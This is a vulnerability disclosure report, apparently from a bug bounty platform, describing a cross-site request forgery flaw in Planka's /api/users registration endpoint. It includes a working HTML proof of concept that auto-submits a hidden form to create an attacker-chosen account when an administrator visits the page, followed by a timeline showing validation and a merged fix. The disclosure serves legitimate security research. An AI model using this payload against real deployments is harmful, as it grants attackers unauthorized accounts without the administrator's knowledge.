Cross-Site Request Forgery in plankanban/planka

Valid

Reported on

Aug 4th 2022


Description

The administrative /api/users registration endpoint is vulnerable to an Cross-Site Request Forgery attack due the lack of any kind of anti-CSRF token verification.

Proof of Concept

  1. 1 - An authenticated administrator visits an attacker-controllable website, in this case the PoC file.
  2. 2 - When the page loads, a new account will be created using the attacker chosen credentials.
<html>
    <body>
        <script>history.pushState('', '', '/')</script>
        <form action="http://localhost:3000/api/users" method="POST">
        <input type="hidden" name="action" value="post" />
        <input type="hidden" name="email" value="attacker-email@email.com" />
        <input type="hidden" name="password" value="password" />
        <input type="hidden" name="name" value="attacker-name" />
        <input type="hidden" name="username" value="attacker-username" />
        <input type="submit" value="Submit request" />
        </form>
        <script>
            document.forms[0].submit();
        </script>
    </body>
</html>

Impact

An attacker can gain access to the platform via the newly created account without the administrator knowledge.

We are processing your report and will contact the plankanban/planka team within 24 hours. 2 months ago
We have contacted a member of the plankanban/planka team and are waiting to hear back 2 months ago
Maksim Eltyshev validated this vulnerability 2 months ago
vultza has been awarded the disclosure bounty
The fix bounty is now up for grabs
The researcher's credibility has increased: +7
Maksim Eltyshev confirmed that a fix has been merged on 778653 a month ago
The fix bounty has been dropped
create.js#L63-L82 has been validated
to join this conversation